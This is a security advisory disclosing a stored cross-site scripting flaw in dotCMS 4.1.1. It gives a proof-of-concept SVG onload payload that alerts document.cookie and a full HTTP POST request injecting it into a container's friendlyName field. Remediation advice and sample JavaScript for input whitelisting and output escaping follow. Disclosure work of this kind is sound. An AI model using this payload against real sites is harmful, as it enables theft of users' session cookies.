[+] CVE ID: Pending
[+] Credits: Brett DeWall aka @xbadbiddyx
[+] Websites: https://github.com/badbiddy
[+] Source: https://raw.githubusercontent.com/badbiddy/Vulnerability-Disclosure/master/dotCMS%20%3E%204.1.1%20-%20Stored%20XSS

Vendor:
==========================
dotCMS
https://www.dotcms.com/

Product:
===========
dotCMS

Version: 4.1.1

Vulnerability Type:
==========================
Stored Cross-Site Scripting (XSS)

Vulnerability Details:
=====================
The application is vulnerable to stored XSS within multiple sections of the application. It does not sanitize user-supplied input and renders injected JavaScript code in users' browsers. Attackers use this class of vulnerability to inject malicious JavaScript code such as a malicious redirect, cryptocurrency mining, or an exploit kit.

Replication:
=====================
1) Navigate to the following example pages:
- https://demo.dotcms.com/dotAdmin/#/c/vanity-urls -- Title parameter
- https://demo.dotcms.com/dotAdmin/#/c/containers -- Description parameter
- https://demo.dotcms.com/dotAdmin/#/c/templates -- Description parameter

2) Each of these areas of the application allows unsanitized input to be supplied by a user. The following payload was utilized in the testing:
or "%3Csvg%2Fonload%3Dalert%28document.cookie%29%3E"

3) Perform the normal function within the application to create a new Vanity URL, Container, or Template; inserting the payload into the specific parameter location will trigger the vulnerability.

Example HTTP Request with XSS payload:
=====================
HTTP Request:

POST /c/portal/layout?p_l_id=b7ab5d3c-5ee0-4195-a17e-8f5579d718dd&p_p_id=containers&p_p_action=1&p_p_state=maximized&p_p_mode=view&_containers_struts_action=%2Fext%2Fcontainers%2Fedit_container HTTP/1.1
Host: demo.dotcms.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:56.0) Gecko/20100101 Firefox/56.0

_containers_cmd=add&_containers_referer=%252Fc%252Fportal%252Flayout%253Fp_l_id%253Db7ab5d3c-5ee0-4195-a17e-8f5579d718dd%2526p_p_id%253Dcontainers%2526p_p_action%253D1%2526p_p_state%253Dmaximized%2526_containers_pageNumber%253D1%2526_containers_struts_action%253D%25252Fext%25252Fcontainers%25252Fview_containers&_containers_redirect=https%3A%2F%2Fdemo.dotcms.com%2Fc%2Fportal%2Flayout%3Fp_l_id%3Db7ab5d3c-5ee0-4195-a17e-8f5579d718dd%26p_p_id%3Dcontainers%26p_p_action%3D0%26p_p_state%3Dmaximized%26p_p_mode%3Dview%26_containers_struts_action%3D%252Fext%252Fcontainers%252Fview_containers&_containers_subcmd=&_containers_inode=69956b08-e4d6-4f97-8101-55446da1e1cb&userId=dotcms.org.1&hostId=48190c8c-42c4-46af-8d1a-0cd5db894797&title=TEST&friendlyName=TEST%3Csvg%2Fonload%3Dalert%28document.cookie%29%3E&maxContentlets=0&preLoopMask=&preLoop=&toggleEditorPreLoop=on&structureInode=4c441ada-944a-43af-a653-9bb4f3f0cb2b&toggleEditorCodeMultiple=on&codeMask=TEST&code=TEST&toggleEditorCode=on&postLoopMask=&postLoop=&toggleEditorPostLoop=on&notes=&permissionsUserSelector=

Remediation Details:
=====================
Prevent the application from rendering JavaScript supplied by the end user. Create a whitelist of allowed characters for each input field. Sanitize user-supplied input server side.

Timeline:
=====================
2017-10-06 - Issue Reported to Vendor

[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere.

badbiddy
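The two remediation measures from the advisory (a per-field whitelist applied server side, and output encoding so a stored value can never render as markup) as an added illustration; this is example code, not part of dotCMS or of the advisory, and the field names, whitelist policy and the abridged request body are assumptions for illustration:

```javascript
// Added example (not dotCMS code): server-side whitelist validation and
// output encoding for a stored text field such as a container's friendlyName.
// Field names and the whitelist policy are assumptions for illustration.

// Constructed request body, abridged from the advisory's POST: only the two
// title fields are kept, with the svg/onload value URL-encoded as it was sent.
const SAMPLE_BODY =
  'title=TEST&friendlyName=TEST%3Csvg%2Fonload%3Dalert%28document.cookie%29%3E';

// Parse the form body and return the decoded value of one parameter
// (null when the parameter is absent).
function getParam(body, name) {
  return new URLSearchParams(body).get(name);
}

// Hypothetical whitelist for short display names: letters, digits, space and
// a few punctuation marks, 1-100 characters. Anything else, including '<',
// '>', '"' and "'", is rejected before it can reach storage.
const TITLE_PATTERN = /^[A-Za-z0-9 ._-]{1,100}$/;
function isAllowedTitle(value) {
  return typeof value === 'string' && TITLE_PATTERN.test(value);
}

// Output encoding for an HTML text context. Applied at render time, it turns
// an already-stored payload into literal text instead of live markup.
const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;',
};
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Check every named field of the body against the policy and return the
// names of the fields that fail, so the whole request can be rejected.
function rejectedFields(body, fieldNames) {
  const params = new URLSearchParams(body);
  return fieldNames.filter((f) => !isAllowedTitle(params.get(f) || ''));
}
```

Validation stops the payload at the request boundary, while `escapeHtml` is the defence in depth for values that were stored before the whitelist existed.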